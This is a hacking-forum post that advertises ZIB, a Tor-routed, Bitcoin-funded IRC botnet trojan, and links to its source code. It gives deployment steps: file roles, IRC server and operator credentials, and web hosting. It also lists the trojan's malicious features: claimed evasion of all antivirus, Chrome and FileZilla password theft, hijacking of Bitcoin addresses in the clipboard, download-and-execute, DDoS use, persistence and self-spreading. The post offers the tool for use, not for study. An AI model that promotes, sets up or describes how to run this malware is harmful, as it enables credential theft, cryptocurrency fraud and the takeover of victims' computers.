ZIB-Trojan

Submitted by sam3oul, Thread ID: 43044

06-08-2017, 01:56 PM
The Open Tor Botnet (ZIB) Python-based forever-FUD IRC Trojan

ZIB is fully undetectable and bypasses all antivirus by running on top of Python27's pyinstaller, which is used for many legitimate programs. The only possibility of detection comes from the script; however, the script contains randomized-looking data through using a randomized AES key and initialization vector.

ZIB.py is the main project file. It has 2 errors so nobody who isn't qualified will compile it and do something hazardous.

* intel.py is the chat bot.
* compileZIB.py is used by intel.py, started with chp.exe to run in the background.
* ZIB_imports.txt contains all the imports for ZIB to use. They're appended to the script when compiling.
* btcpurchases.txt includes all the bitcoin payments that are pending. Ones older than 24 hours are deleted.
* channels.txt includes all completed BTC payments.
* You want to point your webserver to dist\ for hosting the files.
* chp.exe is required in the local dir.
* For the IRC server, run bircd, set up an oper with the username Zlo and password RUSSIA!@#$RUSSIA!@#$RUSSIA!@#$RUSSIA!@#$. For the max users per IP, set to 0 because Tor users will look like 127.0.0.1.
* Keep all scripts in Python27/Scripts.
* Put nircmd in the local directory for editing file dates.


- Features

* ZIB is an IRC-based, Bitcoin-funded bot network that runs under Tor for anonymity.
* ZIB is coded totally from scratch and not built on top of someone else's source code.
* ZIB uses the Department of Defense standard for encryption of Top Secret files as one of its methods of making its binaries fully undetectable every time!
* ZIB stands for "Zlo is a Botnet". "Zlo" means "evil" in Russian. (Actually ZIB stands for "ZIB is a Botnet", a self-referencing acronym.)
* ZIB creates a new binary for every user, with different file sizes, creation dates, and rot13->zlib->base64->AES-256(random key+IV) encrypted strings.
* ZIB is 100% fully undetectable (FUD) to Anti-Virus.
* ZIB has an automated system for handling payments, providing bot-net binaries, and creating bot-net IRC channels.
* All bot networks on the ZIB network require a password to join.
* ZIB uses passworded user-based authentication, handled through our Zlo intel bot, so you don't have to worry about people stealing your channel password, main password, or bots. Normal users can't create their own channels. All IRC functionalities are handled by the Zlo IRC intelligence bot. You can do authenticated, single bot commands through Zlo, or set up a user session on your bots, which is slightly less secure.
* Paid users get unlimited bot space per channel.
* Our bot has been tested on and is fully compatible with Windows Server 2008 R2 32-bit, Windows XP SP1 & SP3 32-bit, Windows 7, and Windows 8 64-bit.
* Download & Execute w/ optional SHA256 verification.
* Update w/ optional SHA256 verification.
* Chrome password recovery.
* Each bot can act as a shell booter and use php shells to hit with.
* Replace Bitcoin addresses in clipboard with yours.
* FileZilla password recovery.
* Fully routed through Tor.
* File persistence, registry persistence, startup folder persistence, process persistence, tor process & file persistence.
* Completely hidden.
* 0/60 Fully undetectable to Antivirus.
* File download/upload.
* Process status, starter, and killer.
* Undetectable, instant obfuscation when generating new binaries FREE!
* Self spreading.
* All bot files are verified via hash check. Broken/corrupted files get re-placed.
* Bypasses AntiVirus Deep-Scan.
* Bot location changes, depending on administrative access.

Download & Source :
https://github.com/whitepacket/ZIB-T...ster/README.md